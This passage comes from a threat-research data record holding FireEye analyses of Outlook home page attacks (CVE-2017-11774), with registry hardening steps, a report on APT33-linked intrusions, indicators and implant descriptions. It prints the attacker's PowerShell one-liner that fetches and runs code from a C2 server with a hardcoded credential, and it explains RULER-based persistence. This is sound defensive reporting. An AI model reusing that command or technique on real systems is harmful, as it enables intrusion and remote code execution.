Administrative Templates > Microsoft Outlook <version> > Folder Home Pages for Outlook Special Folders > Do not allow Home Page URL to be set in folder Properties \n--- \n \nThe registry key configuration to disable setting an Outlook home page via the Outlook UI is as follows.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n\"EnableRoamingFolderHomepages\"= dword:00000000 \n--- \n \nTo enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.\n\n * User Configuration > Preferences > Windows Settings > Registry \n * New > Registry Item \n * Action: Update\n * Hive: HKEY_CURRENT_USER\n * Key Path: Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n * Value Name: EnableRoamingFolderHomepages\n * Value Type: REG_DWORD\n * Value Data: 00000000\n\n![](https://www.fireeye.com/sites/default/files/styles/large/public/2021-09/Picture3.png?itok=dBNggiNu)\n\n \nFigure 3: EnableRoamingFolderHomepages registry setting\n\nAdditionally, a home page in Outlook can be configured for folders in a non-default datastore. This functionality is disabled once the patch has been installed, but it can be re-enabled by an attacker. Just like this blog post\u2019s illustration of several different home page URL registry keys abused in-the-wild \u2013 including the Outlook Today setting from September 2018 and the Calendar URL setting from UNC1194\u2019s November 2019 malicious macros \u2013 these non-default mailstores provide additional CVE-2017-11774 attack surface.\n\nThe registry key configuration to enforce the recommended registry configuration is as follows.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n\"NonDefaultStoreScript\"= dword:00000000 \n--- \n \nTo enforce the expected hardened configuration of the registry key for non-default mailstores using a GPO, the following setting can be configured.\n\n * User Configuration > Preferences > Windows Settings > Registry \n * New > Registry Item \n * Action: Update\n * Hive: HKEY_CURRENT_USER\n * Key Path: Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n * Value Name: NonDefaultStoreScript\n * Value Type: REG_DWORD\n * Value Data: 00000000\n\n![](https://www.fireeye.com/sites/default/files/styles/large/public/2021-09/Picture4.png?itok=q5LAgzas)\n\n \nFigure 4: NonDefaultStoreScript registry setting\n\nIncluded within the previously referenced Microsoft Office Administrative Templates, a GPO setting is available which can be configured to not allow folders in non-default stores to be set as folder home pages.\n\nUser Configuration > Policies > Administrative Templates > Microsoft Outlook <version> > Outlook Options > Other > Advanced > Do not allow folders in non-default stores to be set as folder home pages \n--- \n \nWhile you\u2019re locking things down, we thought that readers would also want to ensure they are locked down against RULER\u2019s other modules for [rules-based persistence](<https://sensepost.com/blog/2016/mapi-over-http-and-mailrule-pwnage/>) and [forms-based persistence](<https://sensepost.com/blog/2017/outlook-forms-and-shells/>). This last recommendation ensures that the rule types [required by the other RULER modules](<https://github.com/sensepost/ruler/issues/35#issuecomment-299695731>) are no longer permissible on an endpoint. While not CVE-2017-11774, this is closely related and this last setting is consistent with [Microsoft\u2019s prior guidance](<https://docs.microsoft.com/en-us/archive/blogs/office365security/defending-against-rules-and-forms-injection>) on rules and forms persistence.\n\nThe registry key configuration to protect against an attacker re-enabling \u201cRun as a Script\u201d and \u201cStart Application\u201d rules is as follows.\n\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security\\ \n\"EnableUnsafeClientMailRules\"= dword:00000000 \n--- \n \nTo enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.\n\n * User Configuration > Preferences > Windows Settings > Registry \n * New > Registry Item \n * Action: Update\n * Hive: HKEY_CURRENT_USER\n * Key Path: Software\\Microsoft\\Office\\<Outlook Version>\\Outlook\\Security \n * Value Name: EnableUnsafeClientMailRules\n * Value Type: REG_DWORD\n * Value Data: 00000000\n\n![](https://www.fireeye.com/sites/default/files/styles/large/public/2021-09/Picture5.png?itok=nuOYzTRB)\n\n \nFigure 5: EnableUnsafeClientMailRules registry setting\n\nOnce all of aforementioned endpoint policies are configured \u2013 we recommend a final step to protect these settings from unauthorized tampering. To ensure that the registry settings (configured via GPO) are continuously assessed and applied to an endpoint \u2013 even if the registry value was intentionally reversed by an attacker \u2013 the following GPO settings should also be configured and enforced:\n\n * Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure security policy processing \n * Enabled - Process even if the Group Policy objects have not changed\n * Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure registry policy processing \n * Enabled - Process even if the Group Policy objects have not changed\n\n![](https://www.fireeye.com/sites/default/files/styles/large/public/2021-09/Picture6.png?itok=O0dYMUaj)\n\n \nFigure 6: Group Policy processing settings\n\nFor more environment hardening advice informed by front-line incident response, reach out to our Mandiant Security Transformation Services consulting team.\n\n#### Let\u2019s Go Hunt (doo doo doo)\n\nWith this blog post, we\u2019re providing an IOC for monitoring CVE-2017-11774 registry tampering \u2013 while written for FireEye Endpoint Security (HX) in the [OpenIOC 1.1 schema](<https://github.com/mandiant/OpenIOC_1.1>), this is a flexible behavioral detection standard that supports real-time and historical events and the logic can be repurposed for other endpoint products.\n\nThe Yara hunting rule provided by Nick Carr at the end the OVERRULED blog post still captures payloads using CVE-2017-11774, including all of those used in intrusions referenced in this post, and can also be used to proactively identify home page exploits staged on adversary infrastructure. Further FireEye product detection against CVE-2017-11774 is also covered in the OVERRULED blog post.\n\nIf you\u2019ve read the OVERRULED post (or are tired of hearing about it) but want some additional information, we recommend:\n\n * [\u201cYou\u2019ve Got Mail!\u201d CDS 2018 technical track presentation](<https://youtu.be/BERupu9-CIs>) including an APT34 CVE-2017-11774 home page sample\n * [\u201c2 Factor 2 Furious\u201d CDS 2018 technical track presentation](<https://www.youtube.com/watch?v=pxrwdB78nuM>) on attackers bypassing multifactor \u2013 the best first line of defense against APT33\u2019s password spraying and home page usage\n * [\u201c#GuardrailsOfTheGalaxy\u201d MITRE ATT&CKcon 2019 lightning talk](<https://www.youtube.com/watch?v=hrzR8TpnjAw&t=2098s>) on execution guardrails \u2013 or [see various examples shared on Twitter](<https://twitter.com/search?q=from%3Aitsreallynick%20guardrails%20OR%20guardrailsofthegalaxy&f=live>)\n\nInteresting MITRE ATT&CK techniques explicitly referenced in this blog post:\n\n**ID**\n\n| \n\n**Technique**\n\n| \n\n**Context** \n \n---|---|--- \n \n[T1137](<https://attack.mitre.org/techniques/T1137/>)\n\n| \n\nOffice Application Startup\n\n| \n\nNick Carr contributed CVE-2017-11774 on behalf of FireEye for expansion of this technique \n \n[T1480](<https://attack.mitre.org/techniques/T1480/>)\n\n| \n\nExecution Guardrails\n\n| \n\nNick Carr contributed this new technique to MITRE ATT&CK and it is used within the UNC1194 red team sample in this blog post \n \n#### Acknowledgements\n\nThe authors would like to acknowledge all of those at FireEye and the rest of the security industry who have combatted targeted attackers leveraging creative techniques like home page persistence, but especially the analysts in Managed Defense SOC working around the clock to secure our customers and have disrupted this specific attack chain several times. We want to thank the [SensePost](<https://sensepost.com>) team \u2013 for their continued creativity, responsible disclosure of CVE-2017-11774, and their defensive-minded release of [NotRuler](<https://github.com/sensepost/notruler>) \u2013 as well as the [TrustedSec](<https://www.trustedsec.com>) crew for showing us some innovative implementations of these techniques and being great to coordinate with on this blog post. Lastly, thanks to Aristotle who has already offered what can only be interpreted as seasoned incident response and hardening advice for those who have seen RULER\u2019s home page persistence in-the-wild: _\u201cHe who is to be a good ruler must have first been ruled.\u201d_\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-04T00:00:00", "type": "fireeye", "title": "Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774"], "modified": "2019-12-04T00:00:00", "id": "FIREEYE:138CE2722761C87436AF4E8AA1B5FF22", "href": "https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-01-27T23:01:52", "description": "#### Introduction\n\nFireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's [Managed Defense](<https://www.fireeye.com/solutions/managed-defense.html>) has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.\n\nOn Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity [targeting Energy and Aerospace industries](<https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html>). Recent public reporting indicated possible links between the confirmed APT33 spear phishing and [destructive SHAMOON attacks](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/>); however, we were unable to independently verify this claim. FireEye\u2019s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.\n\n> 45 days ago, during 24x7 monitoring, [#ManagedDefense](<https://twitter.com/hashtag/ManagedDefense?src=hash&ref_src=twsrc%5Etfw>) detected & contained an attempted intrusion from newly-identified adversary infrastructure*. \n \nIt is C2 for a code family we track as POWERTON. \n \n*hxxps://103.236.149[.]100/api/info\n> \n> \u2014 FireEye (@FireEye) [December 15, 2018](<https://twitter.com/FireEye/status/1073744224510722048?ref_src=twsrc%5Etfw>)\n\n#### Identifying the Overlap in Threat Activity\n\nFireEye augments our expertise with an [internally-developed similarity engine](<https://www.camlis.org/matthew-berninger/>) to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is [available within our intelligence portal](<https://intelligence.fireeye.com/reports/18-00021316>). To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.\n\n#### Managed Defense Rapid Responses: Investigating the Attacker\n\nIn mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost\u2019s [RULER](<https://github.com/sensepost/ruler>), to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\\outlook\\live.exe (MD5: _95f3bea43338addc1ad951cd2d42eb6f_).\n\nThe payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system\u2019s architecture, downloaded the appropriate variant of PowerSploit (MD5: _c326f156657d1c41a9c387415bf779d4_ or _0564706ec38d15e981f71eaf474d0ab8_), and reflectively loaded PUPYRAT (MD5: _94cd86a0a4d747472c2b3f1bc3279d77_ or _17587668AC577FCE0B278420B8EB72AC_). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.\n\nFireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor\u2019s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.\n\nIn mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER\u2019s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users\u2019 Outlook client homepages for code execution and persistence. These methods are further explored in this post in the \"RULER In-The-Wild\" section.\n\nThe actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.\n\nDuring the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/OVERRULED/Picture1.png) \nFigure 1: Attacker\u2019s homepage exploit (CVE-2017-11774)\n\nThe main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named \u201cMedia.ps1\u201d within the user\u2019s %LOCALAPPDATA% directory (%LOCALAPPDATA%\\MediaWs\\Media.ps1) as shown in Figure 2.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/OVERRULED/Picture2.png) \nFigure 2: Attacker\u2019s \u201cMedia.ps1\u201d script\n\nThe purpose of \u201cMedia.ps1\u201d was to decode and execute the downloaded binary payload, which was written to disk as \u201cC:\\Users\\Public\\Downloads\\log.dat\u201d. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.\n\nAnalysis of the \u201clog.dat\u201d payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:\n\n * Username and domain\n * Computer name\n * CPU details\n * Current exe PID\n * Configured C2 server\n\nThe C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned \u201cMedia.ps1\u201d PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.\n\nPOSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info)_. _The adversary had limited success with interacting with POWERTON during this time. The actor was able to download and establish persistence for an AutoIt binary named \u201cClouldPackage.exe\u201d (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON \u201cpersist\u201d command. The sole functionality of \u201cClouldPackage.exe\u201d was to execute the following line of PowerShell code:\n\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')\n\nThe purpose of this code is to retrieve \u201csilent mode\u201d POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.\n\nStarting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of \u201cindex.html\u201d were identified during this period. Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/OVERRULED/Picture3.png) \nFigure 3: OS-specific POSHC2 Downloader\n\nFigure 3 shows that the actor made some minor changes, such as encoding the PowerShell \"DownloadString\" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to \u201cVision.ps1\u201d. During this August 2018 activity, the POSHC2 variants were configured with a \u201ckill date\u201d of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time and this functionality is built into the framework.****\n\nOnce again, POSHC2 was used to download a new variant of POWERTON (MD5: _c38069d0bc79acdc28af3820c1123e53_), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.****\n\nDue to Managed Defense\u2019s early containment of these intrusions, we were unable to ascertain the actor\u2019s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim\u2019s network.****\n\n#### Adversary Pursuit: Infrastructure Monitoring\n\nAdvanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5: _8be06571e915ae3f76901d52068e3498_) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info_ _(MD5: _4047e238bbcec147f8b97d849ef40ce5_). This specific URL was identified in a [public discussion](<https://twitter.com/KseProso/status/1073169197541281792>) as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.\n\nOn Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: _f0fe6e9dde998907af76d91ba8f68a05_). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: _53ae59ed03fa5df3bf738bc0775a91d9_).\n\nTable 1 contains the operational timeline for the activity we analyzed.****\n\n**DATE/TIME (UTC)**\n\n| \n\n**NOTE**\n\n| \n\n**INDICATOR** \n \n---|---|--- \n \n2017-08-15 17:06:59\n\n| \n\nAPT33 \u2013 EMPIRE (Used)\n\n| \n\n8a99624d224ab3378598b9895660c890 \n \n2017-09-15 16:49:59\n\n| \n\nAPT33 \u2013 PUPYRAT (Compiled)\n\n| \n\n4b19bccc25750f49c2c1bb462509f84e \n \n2017-11-12 20:42:43\n\n| \n\nGroupA \u2013 AUT2EXE Downloader (Compiled)\n\n| \n\n95f3bea43338addc1ad951cd2d42eb6f \n \n2017-11-14 14:55:14\n\n| \n\nGroupA \u2013 PUPYRAT (Used)\n\n| \n\n17587668ac577fce0b278420b8eb72ac \n \n2018-01-09 19:15:16\n\n| \n\nAPT33 \u2013 PUPYRAT (Compiled)\n\n| \n\n56f5891f065494fdbb2693cfc9bce9ae \n \n2018-02-13 13:35:06\n\n| \n\nAPT33 \u2013 PUPYRAT (Used)\n\n| \n\n56f5891f065494fdbb2693cfc9bce9ae \n \n2018-05-09 18:28:43\n\n| \n\nGroupB \u2013 AUT2EXE (Compiled)\n\n| \n\n46038aa5b21b940099b0db413fa62687 \n \n2018-07-02 07:57:40\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\nfa7790abe9ee40556fb3c5524388de0b \n \n2018-07-16 00:33:01\n\n| \n\nGroupB \u2013 POSHC2 (Compiled)\n\n| \n\n75e680d5fddbdb989812c7ba83e7c425 \n \n2018-07-16 01:39:58\n\n| \n\nGroupB \u2013 POSHC2 (Used)\n\n| \n\n75e680d5fddbdb989812c7ba83e7c425 \n \n2018-07-16 08:36:13\n\n| \n\nGroupB \u2013 POWERTON (Used)\n\n| \n\n46038aa5b21b940099b0db413fa62687 \n \n2018-07-31 22:09:25\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\n129c296c363b6d9da0102aa03878ca7f \n \n2018-08-06 16:27:05\n\n| \n\nGroupB \u2013 POSHC2 (Compiled)\n\n| \n\nfca0ad319bf8e63431eb468603d50eff \n \n2018-08-07 05:10:05\n\n| \n\nGroupB \u2013 POSHC2 (Used)\n\n| \n\n75e680d5fddbdb989812c7ba83e7c425 \n \n2018-08-29 18:14:18\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\n5832f708fd860c88cbdc088acecec4ea \n \n2018-10-09 16:02:55\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\n8d3fe1973183e1d3b0dbec31be8ee9dd \n \n2018-10-09 16:48:09\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\n48d1ed9870ed40c224e50a11bf3523f8 \n \n2018-10-11 21:29:22\n\n| \n\nGroupB \u2013 POWERTON (Used)\n\n| \n\n8be06571e915ae3f76901d52068e3498 \n \n2018-12-13 11:00:00\n\n| \n\nGroupB \u2013 POWERTON (Identified)\n\n| \n\n99649d58c0d502b2dfada02124b1504c \n \nTable 1: Operational Timeline\n\n#### Outlook and Implications\n\nIf the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.\n\nWe will continue to track these clusters independently until we achieve high confidence that they are the same. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.\n\n#### Custom Backdoor: POWERTON\n\nPOWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including [WMI](<https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html>) and auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and leverage AES encryption for communication traffic to and from the C2. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers.\n\nFireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.\n\nTable 2 contains samples of POWERTON.\n\n**Hash of Obfuscated File (MD5)**\n\n| \n\n**Hash of Deobfuscated File (MD5)**\n\n| \n\n**Version** \n \n---|---|--- \n \n**974b999186ff434bee3ab6d61411731f**\n\n| \n\n3871aac486ba79215f2155f32d581dc2\n\n| \n\nV1 \n \n**e2d60bb6e3e67591e13b6a8178d89736**\n\n| \n\n2cd286711151efb61a15e2e11736d7d2\n\n| \n\nV1 \n \n**bd80fcf5e70a0677ba94b3f7c011440e**\n\n| \n\n5a66480e100d4f14e12fceb60e91371d\n\n| \n\nV1 \n \n**4047e238bbcec147f8b97d849ef40ce5**\n\n| \n\nf5ac89d406e698e169ba34fea59a780e\n\n| \n\nV2 \n \n**c38069d0bc79acdc28af3820c1123e53**\n\n| \n\n4aca006b9afe85b1f11314b39ee270f7\n\n| \n\nV2 \n \n**N/A**\n\n| \n\n7f4f7e307a11f121d8659ca98bc8ba56\n\n| \n\nV2 \n \n**53ae59ed03fa5df3bf738bc0775a91d9**\n\n| \n\n99649d58c0d502b2dfada02124b1504c\n\n| \n\nV2 \n \nTable 2: POWERTON malware samples\n\n#### Adversary Methods: Email Exploitation on the Rise\n\nOutlook and Exchange are ubiquitous with the concept of email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose any email server access to the public internet for its users, those systems become intrusion vectors. FireEye has observed an increase in [targeted adversaries challenging and subverting security controls on Exchange and Office365.](<https://summit.fireeye.com/content/fireeye-summit/en_US/learn/tracks.html#technical-3>) Our Mandiant consultants also presented [several new methods used by adversaries to subvert multifactor authentication](<https://summit.fireeye.com/learn/tracks.html#technical-8>) at FireEye Cyber Defense Summit 2018.\n\nAt FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.\n\nAn adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:\n\n * Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. Did they re-use that password?\n * Previous compromise within your organization where credentials were compromised but not identified or reset.\n * Poor password choice or password security policies resulting in brute-forced credentials.\n * Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via [documents](<https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/>) intended to phish them from users.\n * Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.\n\nOnce the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange\u2019s legitimate features.\n\n#### RULER In-The-Wild: Here, There, and Everywhere\n\nSensePost\u2019s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP protocol. As detailed in the \"Managed Defense Rapid Responses\" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with _Aut2Exe_ (MD5: _95f3bea43338addc1ad951cd2d42eb6f)_, and executed a PowerShell one-liner to retrieve further malicious content.\n\nWithout the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:\n\n * Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.\n * The transfer of _95f3bea43338addc1ad951cd2d42eb6f_ was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that [WebDAV hosted payload](<https://github.com/sensepost/ruler/wiki/Rules#webdav>).\n * The choice of WebDAV for this initial transfer of stager is the result of restrictions in mail rule creation; the payload must be \"locally\" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's [initial write-up](<https://silentbreaksecurity.com/malicious-outlook-rules/>) prior to RULER\u2019s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your malicious payload via an Outlook Rule. WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a domain joined host communicating via SMB to a non-domain joined host at an arbitrary IP address.\n * The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. _95f3bea43338addc1ad951cd2d42eb6f_ does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.\n\nWith that in mind, the initial infection vector is illustrated in Figure 4.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/OVERRULED/Picture4.png) \nFigure 4: Initial infection vector\n\nAs both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible [disclosure of CVE-2017-11774](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-11774>) was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker\u2019s perspective, [refer to SensePost's blog](<https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/>).\n\nFireEye [has observed](<https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf>) and [documented](<https://twitter.com/ItsReallyNick/status/1014522001900306433>) an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.\n\nUnderstanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend the organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. Beyond implementing multi-factor authentication for Outlook 